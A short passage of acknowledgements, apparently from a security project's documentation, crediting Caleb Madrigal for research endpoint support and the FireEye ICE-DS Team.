  • Research endpoint support from Caleb Madrigal.
  • The FireEye ICE-DS Team.